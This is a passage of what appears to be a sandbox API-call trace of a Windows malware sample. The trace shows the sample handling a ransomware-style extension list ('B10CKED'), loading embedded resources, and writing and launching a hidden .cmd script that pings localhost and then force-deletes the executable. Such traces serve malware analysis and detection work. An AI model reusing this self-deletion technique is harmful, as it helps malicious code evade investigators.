lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0096.943] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0096.943] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0096.943] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0096.943] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0096.943] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0096.943] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0096.943] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0096.943] CharLowerBuffW (in: lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0096.943] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0096.943] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0096.943] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0096.943] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0096.943] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0096.943] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0096.943] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0096.943] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0096.943] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0096.943] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4071a4, lpParameter=0x13f0df0, dwCreationFlags=0x4, lpThreadId=0x140dd84 | out: lpThreadId=0x140dd84*=0xba0) returned 0xb8 [0097.354] SetThreadPriority (hThread=0xb8, nPriority=0) returned 1 [0097.354] ResumeThread (hThread=0xb8) returned 0x1 [0097.354] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xea60) returned 0x0 [0097.651] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa44, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe")) returned 0x30 [0097.651] FindResourceW (hModule=0x400000, lpName="STCLR", lpType=0xa) returned 0x51c510 [0097.651] LoadResource (hModule=0x400000, hResInfo=0x51c510) returned 0x5187d4 [0097.651] SizeofResource (hModule=0x400000, hResInfo=0x51c510) returned 0x53 [0097.652] LockResource (hResData=0x5187d4) returned 0x5187d4 [0097.652] FreeResource (hResData=0x5187d4) returned 0 [0097.652] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0097.652] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0097.652] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0097.652] LockResource (hResData=0x50d64c) returned 0x50d64c [0097.652] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415120, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0097.652] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415120, cbMultiByte=38, lpWideCharStr=0x140df6c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0097.652] FreeResource (hResData=0x50d64c) returned 0 [0097.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0097.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1415124, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0097.652] GetCurrentThreadId () returned 0xb78 [0097.652] GetCurrentThreadId () returned 0xb78 [0097.652] GetCurrentThreadId () returned 0xb78 [0097.652] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x140de48, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0097.652] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x140de48, cbMultiByte=83, lpWideCharStr=0x13a012c, cchWideChar=83 | out: lpWideCharStr="[RNDSTR].cmd\r\nping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"") returned 83 [0097.652] GetTickCount () returned 0x23513 [0097.652] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbb8 | out: lpPerformanceCount=0x12fbb8*=15444125476) returned 1 [0097.652] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="2畔﮴\x12\x1c翻") returned 1 [0097.652] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="b畔﮴\x12\x1c翻") returned 1 [0097.652] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="t畔﮴\x12\x1c翻") returned 1 [0097.652] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="K畔﮴\x12\x1c翻") returned 1 [0097.652] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="H畔﮴\x12\x1c翻") returned 1 [0097.652] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="T畔﮴\x12\x1c翻") returned 1 [0097.652] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="z畔﮴\x12\x1c翻") returned 1 [0097.652] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fb94, cbMultiByte=1, lpWideCharStr=0x12eb7c, cchWideChar=2047 | out: lpWideCharStr="b畔﮴\x12\x1c翻") returned 1 [0097.652] CharUpperBuffW (in: lpsz="[RNDSTR].cmd", cchLength=0xc | out: lpsz="[RNDSTR].CMD") returned 0xc [0097.652] CharUpperBuffW (in: lpsz="[RNDSTR]", cchLength=0x8 | out: lpsz="[RNDSTR]") returned 0x8 [0097.652] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe", lpszShortPath=0x13ac65c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe") returned 0x30 [0097.653] CharUpperBuffW (in: lpsz="ping -n 3 localhost\r\ndel /f /q \"[SELF_NAME]\"\r\ndel /f /q \"[SELF_NAME]\"\r\n", cchLength=0x47 | out: lpsz="PING -N 3 LOCALHOST\r\nDEL /F /Q \"[SELF_NAME]\"\r\nDEL /F /Q \"[SELF_NAME]\"\r\n") returned 0x47 [0097.653] CharUpperBuffW (in: lpsz="[SELF_NAME]", cchLength=0xb | out: lpsz="[SELF_NAME]") returned 0xb [0097.653] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\2btkhtzb.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe8 [0097.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0097.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 145 [0097.653] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"\r\n", cchWideChar=145, lpMultiByteStr=0x138fbd8, cbMultiByte=145, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ping -n 3 localhost\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"\r\ndel /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\"\r\n", lpUsedDefaultChar=0x0) returned 145 [0097.653] WriteFile (in: hFile=0xe8, lpBuffer=0x138fbd8*, nNumberOfBytesToWrite=0x91, lpNumberOfBytesWritten=0x12fb60, lpOverlapped=0x0 | out: lpBuffer=0x138fbd8*, lpNumberOfBytesWritten=0x12fb60*=0x91, lpOverlapped=0x0) returned 1 [0097.654] CloseHandle (hObject=0xe8) returned 1 [0097.655] GetCurrentThreadId () returned 0xb78 [0097.655] GetCurrentThreadId () returned 0xb78 [0097.655] GetCurrentThreadId () returned 0xb78 [0097.655] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fc14*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fc04 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\2btKHTzb.cmd\"", lpProcessInformation=0x12fc04*(hProcess=0xec, hThread=0xe8, dwProcessId=0xbcc, dwThreadId=0xbd0)) returned 1 [0097.662] CloseHandle (hObject=0xec) returned 1 [0097.662] CloseHandle (hObject=0xe8) returned 1 [0097.662] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.662] GetCurrentThreadId () returned 0xb78 [0097.663] GetCurrentThreadId () returned 0xb78 [0097.663] GetCurrentThreadId () returned 0xb78 [0097.663] GetCurrentThreadId () returned 0xb78 [0097.663] GetCurrentThreadId () returned 0xb78 [0097.663] GetCurrentThreadId () returned 0xb78 [0097.663] GetCurrentThreadId () returned 0xb78 [0097.663] GetCurrentThreadId () returned 0xb78 [0097.663] GetCurrentThreadId () returned 0xb78 [0097.663] GetCurrentThreadId () returned 0xb78 [0097.663] GetCurrentThreadId () returned 0xb78 [0097.663] WSACleanup () returned 0 [0097.838] FreeLibrary (hLibModule=0x77380000) returned 1 [0097.838] GetCurrentThreadId () returned 0xb78 [0097.838] GetCurrentThreadId () returned 0xb78 [0097.838] GetCurrentProcess () returned 0xffffffff [0097.838] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x400000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x40, RegionSize=0x11d000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c [0097.838] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x51d000, lpBuffer=0x12fbd8, dwLength=0x1c | out: lpBuffer=0x12fbd8*(BaseAddress=0x51d000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x3000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0097.838] GetCurrentThreadId () returned 0xb78 [0097.838] GetCurrentThreadId () returned 0xb78 [0097.838] ResetEvent (hEvent=0x88) returned 1 [0097.838] GetCurrentThreadId () returned 0xb78 [0097.838] GetCurrentThreadId () returned 0xb78 [0097.838] GetCurrentThreadId () returned 0xb78 [0097.838] ResetEvent (hEvent=0x88) returned 1 [0097.838] GetCurrentThreadId () returned 0xb78 [0097.838] GetCurrentThreadId () returned 0xb78 [0097.838] GetCurrentThreadId () returned 0xb78 [0097.838] GetCurrentThreadId () returned 0xb78 [0097.838] GetCurrentThreadId () returned 0xb78 [0097.838] GetCurrentThreadId () returned 0xb78 [0097.839] GetCurrentThreadId () returned 0xb78 [0097.839] GetCurrentThreadId () returned 0xb78 [0097.839] GetCurrentThreadId () returned 0xb78 [0097.839] GetCurrentThreadId () returned 0xb78 [0097.839] GetCurrentThreadId () returned 0xb78 [0097.839] GetCurrentThreadId () returned 0xb78 [0097.839] GetCurrentThreadId () returned 0xb78 [0097.839] CloseHandle (hObject=0x88) returned 1 [0097.839] CloseHandle (hObject=0x8c) returned 1 [0097.839] CloseHandle (hObject=0x84) returned 1 [0097.839] GetCurrentThreadId () returned 0xb78 [0097.839] GetCurrentThreadId () returned 0xb78 [0097.839] GetCurrentThreadId () returned 0xb78 [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.839] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, wMilliseconds=0x129)) [0097.840] GetLocalTime (in: lpSystemTime=0x12fc1c | out: lpSystemTime=0x12fc1c*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0xb, 